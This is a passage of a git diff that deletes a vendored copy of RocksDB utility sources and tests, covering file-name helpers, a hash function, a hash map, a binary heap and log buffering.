-  Status s = WriteStringToFile(env, id, tmp, true);
-  if (s.ok()) {
-    s = env->RenameFile(tmp, IdentityFileName(dbname));
-  }
-  if (!s.ok()) {
-    env->DeleteFile(tmp);
-  }
-  return s;
-}
-
-Status SyncManifest(Env* env, const ImmutableDBOptions* db_options,
-                    WritableFileWriter* file) {
-  TEST_KILL_RANDOM("SyncManifest:0", rocksdb_kill_odds * REDUCE_ODDS2);
-  StopWatch sw(env, db_options->statistics.get(), MANIFEST_FILE_SYNC_MICROS);
-  return file->Sync(db_options->use_fsync);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/filename.h b/thirdparty/rocksdb/util/filename.h
deleted file mode 100644
index 0d4bacf..0000000
--- a/thirdparty/rocksdb/util/filename.h
+++ /dev/null
@@ -1,169 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// File names used by DB code
-
-#pragma once
-#include <stdint.h>
-#include <unordered_map>
-#include <string>
-#include <vector>
-
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/transaction_log.h"
-
-namespace rocksdb {
-
-class Env;
-class Directory;
-class WritableFileWriter;
-
-enum FileType {
-  kLogFile,
-  kDBLockFile,
-  kTableFile,
-  kDescriptorFile,
-  kCurrentFile,
-  kTempFile,
-  kInfoLogFile,  // Either the current one, or an old one
-  kMetaDatabase,
-  kIdentityFile,
-  kOptionsFile,
-  kBlobFile
-};
-
-// Return the name of the log file with the specified number
-// in the db named by "dbname".  The result will be prefixed with
-// "dbname".
-extern std::string LogFileName(const std::string& dbname, uint64_t number);
-
-extern std::string BlobFileName(const std::string& bdirname, uint64_t number);
-
-static const std::string ARCHIVAL_DIR = "archive";
-
-extern std::string ArchivalDirectory(const std::string& dbname);
-
-//  Return the name of the archived log file with the specified number
-//  in the db named by "dbname". The result will be prefixed with "dbname".
-extern std::string ArchivedLogFileName(const std::string& dbname,
-                                       uint64_t num);
-
-extern std::string MakeTableFileName(const std::string& name, uint64_t number);
-
-// Return the name of sstable with LevelDB suffix
-// created from RocksDB sstable suffixed name
-extern std::string Rocks2LevelTableFileName(const std::string& fullname);
-
-// the reverse function of MakeTableFileName
-// TODO(yhchiang): could merge this function with ParseFileName()
-extern uint64_t TableFileNameToNumber(const std::string& name);
-
-// Return the name of the sstable with the specified number
-// in the db named by "dbname".  The result will be prefixed with
-// "dbname".
-extern std::string TableFileName(const std::vector<DbPath>& db_paths,
-                                 uint64_t number, uint32_t path_id);
-
-// Sufficient buffer size for FormatFileNumber.
-const size_t kFormatFileNumberBufSize = 38;
-
-extern void FormatFileNumber(uint64_t number, uint32_t path_id, char* out_buf,
-                             size_t out_buf_size);
-
-// Return the name of the descriptor file for the db named by
-// "dbname" and the specified incarnation number.  The result will be
-// prefixed with "dbname".
-extern std::string DescriptorFileName(const std::string& dbname,
-                                      uint64_t number);
-
-// Return the name of the current file.  This file contains the name
-// of the current manifest file.  The result will be prefixed with
-// "dbname".
-extern std::string CurrentFileName(const std::string& dbname);
-
-// Return the name of the lock file for the db named by
-// "dbname".  The result will be prefixed with "dbname".
-extern std::string LockFileName(const std::string& dbname);
-
-// Return the name of a temporary file owned by the db named "dbname".
-// The result will be prefixed with "dbname".
-extern std::string TempFileName(const std::string& dbname, uint64_t number);
-
-// A helper structure for prefix of info log names.
-struct InfoLogPrefix {
-  char buf[260];
-  Slice prefix;
-  // Prefix with DB absolute path encoded
-  explicit InfoLogPrefix(bool has_log_dir, const std::string& db_absolute_path);
-  // Default Prefix
-  explicit InfoLogPrefix();
-};
-
-// Return the name of the info log file for "dbname".
-extern std::string InfoLogFileName(const std::string& dbname,
-                                   const std::string& db_path = "",
-                                   const std::string& log_dir = "");
-
-// Return the name of the old info log file for "dbname".
-extern std::string OldInfoLogFileName(const std::string& dbname, uint64_t ts,
-                                      const std::string& db_path = "",
-                                      const std::string& log_dir = "");
-
-static const std::string kOptionsFileNamePrefix = "OPTIONS-";
-static const std::string kTempFileNameSuffix = "dbtmp";
-
-// Return a options file name given the "dbname" and file number.
-// Format:  OPTIONS-[number].dbtmp
-extern std::string OptionsFileName(const std::string& dbname,
-                                   uint64_t file_num);
-
-// Return a temp options file name given the "dbname" and file number.
-// Format:  OPTIONS-[number]
-extern std::string TempOptionsFileName(const std::string& dbname,
-                                       uint64_t file_num);
-
-// Return the name to use for a metadatabase. The result will be prefixed with
-// "dbname".
-extern std::string MetaDatabaseName(const std::string& dbname,
-                                    uint64_t number);
-
-// Return the name of the Identity file which stores a unique number for the db
-// that will get regenerated if the db loses all its data and is recreated fresh
-// either from a backup-image or empty
-extern std::string IdentityFileName(const std::string& dbname);
-
-// If filename is a rocksdb file, store the type of the file in *type.
-// The number encoded in the filename is stored in *number.  If the
-// filename was successfully parsed, returns true.  Else return false.
-// info_log_name_prefix is the path of info logs.
-extern bool ParseFileName(const std::string& filename, uint64_t* number,
-                          const Slice& info_log_name_prefix, FileType* type,
-                          WalFileType* log_type = nullptr);
-// Same as previous function, but skip info log files.
-extern bool ParseFileName(const std::string& filename, uint64_t* number,
-                          FileType* type, WalFileType* log_type = nullptr);
-
-// Make the CURRENT file point to the descriptor file with the
-// specified number.
-extern Status SetCurrentFile(Env* env, const std::string& dbname,
-                             uint64_t descriptor_number,
-                             Directory* directory_to_fsync);
-
-// Make the IDENTITY file for the db
-extern Status SetIdentityFile(Env* env, const std::string& dbname);
-
-// Sync manifest file `file`.
-extern Status SyncManifest(Env* env, const ImmutableDBOptions* db_options,
-                           WritableFileWriter* file);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/filter_policy.cc b/thirdparty/rocksdb/util/filter_policy.cc
deleted file mode 100644
index efb9bf4..0000000
--- a/thirdparty/rocksdb/util/filter_policy.cc
+++ /dev/null
@@ -1,16 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/filter_policy.h"
-
-namespace rocksdb {
-
-FilterPolicy::~FilterPolicy() { }
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash.cc b/thirdparty/rocksdb/util/hash.cc
deleted file mode 100644
index a0660c6..0000000
--- a/thirdparty/rocksdb/util/hash.cc
+++ /dev/null
@@ -1,56 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <string.h>
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-uint32_t Hash(const char* data, size_t n, uint32_t seed) {
-  // Similar to murmur hash
-  const uint32_t m = 0xc6a4a793;
-  const uint32_t r = 24;
-  const char* limit = data + n;
-  uint32_t h = static_cast<uint32_t>(seed ^ (n * m));
-
-  // Pick up four bytes at a time
-  while (data + 4 <= limit) {
-    uint32_t w = DecodeFixed32(data);
-    data += 4;
-    h += w;
-    h *= m;
-    h ^= (h >> 16);
-  }
-
-  // Pick up remaining bytes
-  switch (limit - data) {
-    // Note: The original hash implementation used data[i] << shift, which
-    // promotes the char to int and then performs the shift. If the char is
-    // negative, the shift is undefined behavior in C++. The hash algorithm is
-    // part of the format definition, so we cannot change it; to obtain the same
-    // behavior in a legal way we just cast to uint32_t, which will do
-    // sign-extension. To guarantee compatibility with architectures where chars
-    // are unsigned we first cast the char to int8_t.
-    case 3:
-      h += static_cast<uint32_t>(static_cast<int8_t>(data[2])) << 16;
-    // fall through
-    case 2:
-      h += static_cast<uint32_t>(static_cast<int8_t>(data[1])) << 8;
-    // fall through
-    case 1:
-      h += static_cast<uint32_t>(static_cast<int8_t>(data[0]));
-      h *= m;
-      h ^= (h >> r);
-      break;
-  }
-  return h;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash.h b/thirdparty/rocksdb/util/hash.h
deleted file mode 100644
index 4a13f45..0000000
--- a/thirdparty/rocksdb/util/hash.h
+++ /dev/null
@@ -1,35 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Simple hash function used for internal data structures
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-extern uint32_t Hash(const char* data, size_t n, uint32_t seed);
-
-inline uint32_t BloomHash(const Slice& key) {
-  return Hash(key.data(), key.size(), 0xbc9f1d34);
-}
-
-inline uint32_t GetSliceHash(const Slice& s) {
-  return Hash(s.data(), s.size(), 397);
-}
-
-// std::hash compatible interface.
-struct SliceHasher {
-  uint32_t operator()(const Slice& s) const { return GetSliceHash(s); }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash_map.h b/thirdparty/rocksdb/util/hash_map.h
deleted file mode 100644
index 7b08fb3..0000000
--- a/thirdparty/rocksdb/util/hash_map.h
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include <algorithm>
-#include <array>
-#include <utility>
-
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// This is similar to std::unordered_map, except that it tries to avoid
-// allocating or deallocating memory as much as possible. With
-// std::unordered_map, an allocation/deallocation is made for every insertion
-// or deletion because of the requirement that iterators remain valid even
-// with insertions or deletions. This means that the hash chains will be
-// implemented as linked lists.
-//
-// This implementation uses autovector as hash chains insteads.
-//
-template <typename K, typename V, size_t size = 128>
-class HashMap {
-  std::array<autovector<std::pair<K, V>, 1>, size> table_;
-
- public:
-  bool Contains(K key) {
-    auto& bucket = table_[key % size];
-    auto it = std::find_if(
-        bucket.begin(), bucket.end(),
-        [key](const std::pair<K, V>& p) { return p.first == key; });
-    return it != bucket.end();
-  }
-
-  void Insert(K key, V value) {
-    auto& bucket = table_[key % size];
-    bucket.push_back({key, value});
-  }
-
-  void Delete(K key) {
-    auto& bucket = table_[key % size];
-    auto it = std::find_if(
-        bucket.begin(), bucket.end(),
-        [key](const std::pair<K, V>& p) { return p.first == key; });
-    if (it != bucket.end()) {
-      auto last = bucket.end() - 1;
-      if (it != last) {
-        *it = *last;
-      }
-      bucket.pop_back();
-    }
-  }
-
-  V& Get(K key) {
-    auto& bucket = table_[key % size];
-    auto it = std::find_if(
-        bucket.begin(), bucket.end(),
-        [key](const std::pair<K, V>& p) { return p.first == key; });
-    return it->second;
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash_test.cc b/thirdparty/rocksdb/util/hash_test.cc
deleted file mode 100644
index 959e8cd..0000000
--- a/thirdparty/rocksdb/util/hash_test.cc
+++ /dev/null
@@ -1,73 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <vector>
-
-#include "util/hash.h"
-#include "util/testharness.h"
-
-// The hash algorithm is part of the file format, for example for the Bloom
-// filters. Test that the hash values are stable for a set of random strings of
-// varying lengths.
-TEST(HashTest, Values) {
-  using rocksdb::Hash;
-  constexpr uint32_t kSeed = 0xbc9f1d34;  // Same as BloomHash.
-
-  EXPECT_EQ(Hash("", 0, kSeed), 3164544308);
-  EXPECT_EQ(Hash("\x08", 1, kSeed), 422599524);
-  EXPECT_EQ(Hash("\x17", 1, kSeed), 3168152998);
-  EXPECT_EQ(Hash("\x9a", 1, kSeed), 3195034349);
-  EXPECT_EQ(Hash("\x1c", 1, kSeed), 2651681383);
-  EXPECT_EQ(Hash("\x4d\x76", 2, kSeed), 2447836956);
-  EXPECT_EQ(Hash("\x52\xd5", 2, kSeed), 3854228105);
-  EXPECT_EQ(Hash("\x91\xf7", 2, kSeed), 31066776);
-  EXPECT_EQ(Hash("\xd6\x27", 2, kSeed), 1806091603);
-  EXPECT_EQ(Hash("\x30\x46\x0b", 3, kSeed), 3808221797);
-  EXPECT_EQ(Hash("\x56\xdc\xd6", 3, kSeed), 2157698265);
-  EXPECT_EQ(Hash("\xd4\x52\x33", 3, kSeed), 1721992661);
-  EXPECT_EQ(Hash("\x6a\xb5\xf4", 3, kSeed), 2469105222);
-  EXPECT_EQ(Hash("\x67\x53\x81\x1c", 4, kSeed), 118283265);
-  EXPECT_EQ(Hash("\x69\xb8\xc0\x88", 4, kSeed), 3416318611);
-  EXPECT_EQ(Hash("\x1e\x84\xaf\x2d", 4, kSeed), 3315003572);
-  EXPECT_EQ(Hash("\x46\xdc\x54\xbe", 4, kSeed), 447346355);
-  EXPECT_EQ(Hash("\xd0\x7a\x6e\xea\x56", 5, kSeed), 4255445370);
-  EXPECT_EQ(Hash("\x86\x83\xd5\xa4\xd8", 5, kSeed), 2390603402);
-  EXPECT_EQ(Hash("\xb7\x46\xbb\x77\xce", 5, kSeed), 2048907743);
-  EXPECT_EQ(Hash("\x6c\xa8\xbc\xe5\x99", 5, kSeed), 2177978500);
-  EXPECT_EQ(Hash("\x5c\x5e\xe1\xa0\x73\x81", 6, kSeed), 1036846008);
-  EXPECT_EQ(Hash("\x08\x5d\x73\x1c\xe5\x2e", 6, kSeed), 229980482);
-  EXPECT_EQ(Hash("\x42\xfb\xf2\x52\xb4\x10", 6, kSeed), 3655585422);
-  EXPECT_EQ(Hash("\x73\xe1\xff\x56\x9c\xce", 6, kSeed), 3502708029);
-  EXPECT_EQ(Hash("\x5c\xbe\x97\x75\x54\x9a\x52", 7, kSeed), 815120748);
-  EXPECT_EQ(Hash("\x16\x82\x39\x49\x88\x2b\x36", 7, kSeed), 3056033698);
-  EXPECT_EQ(Hash("\x59\x77\xf0\xa7\x24\xf4\x78", 7, kSeed), 587205227);
-  EXPECT_EQ(Hash("\xd3\xa5\x7c\x0e\xc0\x02\x07", 7, kSeed), 2030937252);
-  EXPECT_EQ(Hash("\x31\x1b\x98\x75\x96\x22\xd3\x9a", 8, kSeed), 469635402);
-  EXPECT_EQ(Hash("\x38\xd6\xf7\x28\x20\xb4\x8a\xe9", 8, kSeed), 3530274698);
-  EXPECT_EQ(Hash("\xbb\x18\x5d\xf4\x12\x03\xf7\x99", 8, kSeed), 1974545809);
-  EXPECT_EQ(Hash("\x80\xd4\x3b\x3b\xae\x22\xa2\x78", 8, kSeed), 3563570120);
-  EXPECT_EQ(Hash("\x1a\xb5\xd0\xfe\xab\xc3\x61\xb2\x99", 9, kSeed), 2706087434);
-  EXPECT_EQ(Hash("\x8e\x4a\xc3\x18\x20\x2f\x06\xe6\x3c", 9, kSeed), 1534654151);
-  EXPECT_EQ(Hash("\xb6\xc0\xdd\x05\x3f\xc4\x86\x4c\xef", 9, kSeed), 2355554696);
-  EXPECT_EQ(Hash("\x9a\x5f\x78\x0d\xaf\x50\xe1\x1f\x55", 9, kSeed), 1400800912);
-  EXPECT_EQ(Hash("\x22\x6f\x39\x1f\xf8\xdd\x4f\x52\x17\x94", 10, kSeed),
-            3420325137);
-  EXPECT_EQ(Hash("\x32\x89\x2a\x75\x48\x3a\x4a\x02\x69\xdd", 10, kSeed),
-            3427803584);
-  EXPECT_EQ(Hash("\x06\x92\x5c\xf4\x88\x0e\x7e\x68\x38\x3e", 10, kSeed),
-            1152407945);
-  EXPECT_EQ(Hash("\xbd\x2c\x63\x38\xbf\xe9\x78\xb7\xbf\x15", 10, kSeed),
-            3382479516);
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/heap.h b/thirdparty/rocksdb/util/heap.h
deleted file mode 100644
index 4d58941..0000000
--- a/thirdparty/rocksdb/util/heap.h
+++ /dev/null
@@ -1,166 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <algorithm>
-#include <cstdint>
-#include <functional>
-#include "port/port.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// Binary heap implementation optimized for use in multi-way merge sort.
-// Comparison to std::priority_queue:
-// - In libstdc++, std::priority_queue::pop() usually performs just over logN
-//   comparisons but never fewer.
-// - std::priority_queue does not have a replace-top operation, requiring a
-//   pop+push.  If the replacement element is the new top, this requires
-//   around 2logN comparisons.
-// - This heap's pop() uses a "schoolbook" downheap which requires up to ~2logN
-//   comparisons.
-// - This heap provides a replace_top() operation which requires [1, 2logN]
-//   comparisons.  When the replacement element is also the new top, this
-//   takes just 1 or 2 comparisons.
-//
-// The last property can yield an order-of-magnitude performance improvement
-// when merge-sorting real-world non-random data.  If the merge operation is
-// likely to take chunks of elements from the same input stream, only 1
-// comparison per element is needed.  In RocksDB-land, this happens when
-// compacting a database where keys are not randomly distributed across L0
-// files but nearby keys are likely to be in the same L0 file.
-//
-// The container uses the same counterintuitive ordering as
-// std::priority_queue: the comparison operator is expected to provide the
-// less-than relation, but top() will return the maximum.
-
-template<typename T, typename Compare = std::less<T>>
-class BinaryHeap {
- public:
-  BinaryHeap() { }
-  explicit BinaryHeap(Compare cmp) : cmp_(std::move(cmp)) { }
-
-  void push(const T& value) {
-    data_.push_back(value);
-    upheap(data_.size() - 1);
-  }
-
-  void push(T&& value) {
-    data_.push_back(std::move(value));
-    upheap(data_.size() - 1);
-  }
-
-  const T& top() const {
-    assert(!empty());
-    return data_.front();
-  }
-
-  void replace_top(const T& value) {
-    assert(!empty());
-    data_.front() = value;
-    downheap(get_root());
-  }
-
-  void replace_top(T&& value) {
-    assert(!empty());
-    data_.front() = std::move(value);
-    downheap(get_root());
-  }
-
-  void pop() {
-    assert(!empty());
-    data_.front() = std::move(data_.back());
-    data_.pop_back();
-    if (!empty()) {
-      downheap(get_root());
-    } else {
-      reset_root_cmp_cache();
-    }
-  }
-
-  void swap(BinaryHeap &other) {
-    std::swap(cmp_, other.cmp_);
-    data_.swap(other.data_);
-    std::swap(root_cmp_cache_, other.root_cmp_cache_);
-  }
-
-  void clear() {
-    data_.clear();
-    reset_root_cmp_cache();
-  }
-
-  bool empty() const {
-    return data_.empty();
-  }
-
-  void reset_root_cmp_cache() { root_cmp_cache_ = port::kMaxSizet; }
-
- private:
-  static inline size_t get_root() { return 0; }
-  static inline size_t get_parent(size_t index) { return (index - 1) / 2; }
-  static inline size_t get_left(size_t index) { return 2 * index + 1; }
-  static inline size_t get_right(size_t index) { return 2 * index + 2; }
-
-  void upheap(size_t index) {
-    T v = std::move(data_[index]);
-    while (index > get_root()) {
-      const size_t parent = get_parent(index);
-      if (!cmp_(data_[parent], v)) {
-        break;
-      }
-      data_[index] = std::move(data_[parent]);
-      index = parent;
-    }
-    data_[index] = std::move(v);
-    reset_root_cmp_cache();
-  }
-
-  void downheap(size_t index) {
-    T v = std::move(data_[index]);
-
-    size_t picked_child = port::kMaxSizet;
-    while (1) {
-      const size_t left_child = get_left(index);
-      if (get_left(index) >= data_.size()) {
-        break;
-      }
-      const size_t right_child = left_child + 1;
-      assert(right_child == get_right(index));
-      picked_child = left_child;
-      if (index == 0 && root_cmp_cache_ < data_.size()) {
-        picked_child = root_cmp_cache_;
-      } else if (right_child < data_.size() &&
-                 cmp_(data_[left_child], data_[right_child])) {
-        picked_child = right_child;
-      }
-      if (!cmp_(v, data_[picked_child])) {
-        break;
-      }
-      data_[index] = std::move(data_[picked_child]);
-      index = picked_child;
-    }
-
-    if (index == 0) {
-      // We did not change anything in the tree except for the value
-      // of the root node, left and right child did not change, we can
-      // cache that `picked_child` is the smallest child
-      // so next time we compare againist it directly
-      root_cmp_cache_ = picked_child;
-    } else {
-      // the tree changed, reset cache
-      reset_root_cmp_cache();
-    }
-
-    data_[index] = std::move(v);
-  }
-
-  Compare cmp_;
-  autovector<T> data_;
-  // Used to reduce number of cmp_ calls in downheap()
-  size_t root_cmp_cache_ = port::kMaxSizet;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/heap_test.cc b/thirdparty/rocksdb/util/heap_test.cc
deleted file mode 100644
index b415615..0000000
--- a/thirdparty/rocksdb/util/heap_test.cc
+++ /dev/null
@@ -1,139 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <gtest/gtest.h>
-
-#include <climits>
-
-#include <queue>
-#include <random>
-#include <utility>
-
-#include "util/heap.h"
-
-#ifndef GFLAGS
-const int64_t FLAGS_iters = 100000;
-#else
-#include <gflags/gflags.h>
-DEFINE_int64(iters, 100000, "number of pseudo-random operations in each test");
-#endif  // GFLAGS
-
-/*
- * Compares the custom heap implementation in util/heap.h against
- * std::priority_queue on a pseudo-random sequence of operations.
- */
-
-namespace rocksdb {
-
-using HeapTestValue = uint64_t;
-using Params = std::tuple<size_t, HeapTestValue, int64_t>;
-
-class HeapTest : public ::testing::TestWithParam<Params> {
-};
-
-TEST_P(HeapTest, Test) {
-  // This test performs the same pseudorandom sequence of operations on a
-  // BinaryHeap and an std::priority_queue, comparing output.  The three
-  // possible operations are insert, replace top and pop.
-  //
-  // Insert is chosen slightly more often than the others so that the size of
-  // the heap slowly grows.  Once the size heats the MAX_HEAP_SIZE limit, we
-  // disallow inserting until the heap becomes empty, testing the "draining"
-  // scenario.
-
-  const auto MAX_HEAP_SIZE = std::get<0>(GetParam());
-  const auto MAX_VALUE = std::get<1>(GetParam());
-  const auto RNG_SEED = std::get<2>(GetParam());
-
-  BinaryHeap<HeapTestValue> heap;
-  std::priority_queue<HeapTestValue> ref;
-
-  std::mt19937 rng(static_cast<unsigned int>(RNG_SEED));
-  std::uniform_int_distribution<HeapTestValue> value_dist(0, MAX_VALUE);
-  int ndrains = 0;
-  bool draining = false;     // hit max size, draining until we empty the heap
-  size_t size = 0;
-  for (int64_t i = 0; i < FLAGS_iters; ++i) {
-    if (size == 0) {
-      draining = false;
-    }
-
-    if (!draining &&
-        (size == 0 || std::bernoulli_distribution(0.4)(rng))) {
-      // insert
-      HeapTestValue val = value_dist(rng);
-      heap.push(val);
-      ref.push(val);
-      ++size;
-      if (size == MAX_HEAP_SIZE) {
-        draining = true;
-        ++ndrains;
-      }
-    } else if (std::bernoulli_distribution(0.5)(rng)) {
-      // replace top
-      HeapTestValue val = value_dist(rng);
-      heap.replace_top(val);
-      ref.pop();
-      ref.push(val);
-    } else {
-      // pop
-      assert(size > 0);
-      heap.pop();
-      ref.pop();
-      --size;
-    }
-
-    // After every operation, check that the public methods give the same
-    // results
-    assert((size == 0) == ref.empty());
-    ASSERT_EQ(size == 0, heap.empty());
-    if (size > 0) {
-      ASSERT_EQ(ref.top(), heap.top());
-    }
-  }
-
-  // Probabilities should be set up to occasionally hit the max heap size and
-  // drain it
-  assert(ndrains > 0);
-
-  heap.clear();
-  ASSERT_TRUE(heap.empty());
-}
-
-// Basic test, MAX_VALUE = 3*MAX_HEAP_SIZE (occasional duplicates)
-INSTANTIATE_TEST_CASE_P(
-  Basic, HeapTest,
-  ::testing::Values(Params(1000, 3000, 0x1b575cf05b708945))
-);
-// Mid-size heap with small values (many duplicates)
-INSTANTIATE_TEST_CASE_P(
-  SmallValues, HeapTest,
-  ::testing::Values(Params(100, 10, 0x5ae213f7bd5dccd0))
-);
-// Small heap, large value range (no duplicates)
-INSTANTIATE_TEST_CASE_P(
-  SmallHeap, HeapTest,
-  ::testing::Values(Params(10, ULLONG_MAX, 0x3e1fa8f4d01707cf))
-);
-// Two-element heap
-INSTANTIATE_TEST_CASE_P(
-  TwoElementHeap, HeapTest,
-  ::testing::Values(Params(2, 5, 0x4b5e13ea988c6abc))
-);
-// One-element heap
-INSTANTIATE_TEST_CASE_P(
-  OneElementHeap, HeapTest,
-  ::testing::Values(Params(1, 3, 0x176a1019ab0b612e))
-);
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/kv_map.h b/thirdparty/rocksdb/util/kv_map.h
deleted file mode 100644
index 784a244..0000000
--- a/thirdparty/rocksdb/util/kv_map.h
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <map>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace stl_wrappers {
-
-struct LessOfComparator {
-  explicit LessOfComparator(const Comparator* c = BytewiseComparator())
-      : cmp(c) {}
-
-  bool operator()(const std::string& a, const std::string& b) const {
-    return cmp->Compare(Slice(a), Slice(b)) < 0;
-  }
-  bool operator()(const Slice& a, const Slice& b) const {
-    return cmp->Compare(a, b) < 0;
-  }
-
-  const Comparator* cmp;
-};
-
-typedef std::map<std::string, std::string, LessOfComparator> KVMap;
-}
-}
diff --git a/thirdparty/rocksdb/util/log_buffer.cc b/thirdparty/rocksdb/util/log_buffer.cc
deleted file mode 100644
index d09e0cb..0000000
--- a/thirdparty/rocksdb/util/log_buffer.cc
+++ /dev/null
@@ -1,93 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/log_buffer.h"
-
-#include "port/sys_time.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-LogBuffer::LogBuffer(const InfoLogLevel log_level,
-                     Logger*info_log)
-    : log_level_(log_level), info_log_(info_log) {}
-
-void LogBuffer::AddLogToBuffer(size_t max_log_size, const char* format,
-                               va_list ap) {
-  if (!info_log_ || log_level_ < info_log_->GetInfoLogLevel()) {
-    // Skip the level because of its level.
-    return;
-  }
-
-  char* alloc_mem = arena_.AllocateAligned(max_log_size);
-  BufferedLog* buffered_log = new (alloc_mem) BufferedLog();
-  char* p = buffered_log->message;
-  char* limit = alloc_mem + max_log_size - 1;
-
-  // store the time
-  gettimeofday(&(buffered_log->now_tv), nullptr);
-
-  // Print the message
-  if (p < limit) {
-    va_list backup_ap;
-    va_copy(backup_ap, ap);
-    auto n = vsnprintf(p, limit - p, format, backup_ap);
-#ifndef OS_WIN
-    // MS reports -1 when the buffer is too short
-    assert(n >= 0);
-#endif
-    if (n > 0) {
-      p += n;
-    } else {
-      p = limit;
-    }
-    va_end(backup_ap);
-  }
-
-  if (p > limit) {
-    p = limit;
-  }
-
-  // Add '\0' to the end
-  *p = '\0';
-
-  logs_.push_back(buffered_log);
-}
-
-void LogBuffer::FlushBufferToLog() {
-  for (BufferedLog* log : logs_) {
-    const time_t seconds = log->now_tv.tv_sec;
-    struct tm t;
-    if (localtime_r(&seconds, &t) != nullptr) {
-      Log(log_level_, info_log_,
-          "(Original Log Time %04d/%02d/%02d-%02d:%02d:%02d.%06d) %s",
-          t.tm_year + 1900, t.tm_mon + 1, t.tm_mday, t.tm_hour, t.tm_min,
-          t.tm_sec, static_cast<int>(log->now_tv.tv_usec), log->message);
-    }
-  }
-  logs_.clear();
-}
-
-void LogToBuffer(LogBuffer* log_buffer, size_t max_log_size, const char* format,
-                 ...) {
-  if (log_buffer != nullptr) {
-    va_list ap;
-    va_start(ap, format);
-    log_buffer->AddLogToBuffer(max_log_size, format, ap);
-    va_end(ap);
-  }
-}
-
-void LogToBuffer(LogBuffer* log_buffer, const char* format, ...) {
-  const size_t kDefaultMaxLogSize = 512;
-  if (log_buffer != nullptr) {
-    va_list ap;
-    va_start(ap, format);
-    log_buffer->AddLogToBuffer(kDefaultMaxLogSize, format, ap);
-    va_end(ap);
-  }
-}
-
-}  // namespace rocksdb
